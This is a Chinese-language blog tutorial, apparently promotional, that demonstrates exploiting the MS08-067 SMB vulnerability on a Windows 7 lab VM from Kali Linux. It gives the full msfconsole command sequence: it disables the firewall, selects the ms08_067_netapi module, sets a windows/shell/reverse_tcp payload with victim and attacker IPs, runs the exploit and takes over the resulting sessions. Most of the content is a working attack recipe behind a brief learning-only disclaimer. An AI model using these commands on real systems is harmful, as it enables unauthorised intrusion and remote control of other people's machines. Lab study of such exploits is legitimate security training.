网络安全工程师演示：***是如何利用ms08-067漏洞进行计算机***的？

课前声明：
一、本分享仅作学习交流，请自觉遵照法律法规！
二、搜索：Kali 与编程，学习更多网络***干货！
三、Kali 与编程天天准时更新，敬请学习和关注！
正文部分
1、背景介绍
Metasploit就是一个漏洞框架。它的全称叫作The Metasploit Framework，简称叫作MSF。Metasploit做为全球最受欢迎的工具，不单单是由于它的方便性和强大性，更重要的是它的框架。它容许使用者开发本身的漏洞脚本，从而进行测试。Metasploit(msf)究竟威力如何呢？如何利用***控制受害者主机呢？接下来让咱们一块儿学习！
2、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
3、战略安排
3.1 在微软官网查看微软发布的关于Windows系统的相关漏洞信息，以下图所示，这里咱们重点介绍一下MS08-067漏洞。

3.2 在受害者Windows主机中关闭相应的防火墙以及对应的安全卫士，以下图所示。
步骤：关闭防火墙
命令：Windows键+R/输入cmd/进入dos界面/
命令：firewall.cpl
步骤：关闭防火墙。

3.3 查看受害者主机以及***者主机的IP地址，以下图所示。
命令：ipconfig

命令：ifconfig

3.4 进入Metasploit（msf）***框架，以下图所示。
命令：msfconsole

步骤1：检索关于MS08-067的漏洞利用模块，以下图所示。
命令：search ms08-067

步骤2：使用对应的漏洞利用模块，以下图所示。
命令：use exploit/windows/smb/ms08_067_netapi

步骤3：设置漏洞对应的***参数，以下图所示。
命令：show options（查看有哪些须要设置的***参数）

命令：set payload windows/shell/reverse_tcp

命令：set rhosts 192.168.126.159（受害者主机）

命令：set lhost 192.168.126.186（***者主机）
命令：show target（查看能够***的系统列表）

命令：set target 34

步骤4：查看参数是否配置成功，以下图所示。
命令：show option

步骤5：执行漏洞利用模块，以下图所示。
命令：exploit

3.5 ***成功，成功拿下目标主机，以下图所示。

步骤1：查看当前的会话链接，以下图所示。
命令：sessions -l

步骤2：切换会话，以下图所示。
命令：sessions -i 2

小编一个个字敲打创做，可辛苦了，问君能否关注一下我呢？你还可搜索:Kali与编程，学习更多******技巧呢 ！拒绝盗版，转载请声明来源：Kali与编程
点我学习更多Kali Linux***测试与网络***实战技巧！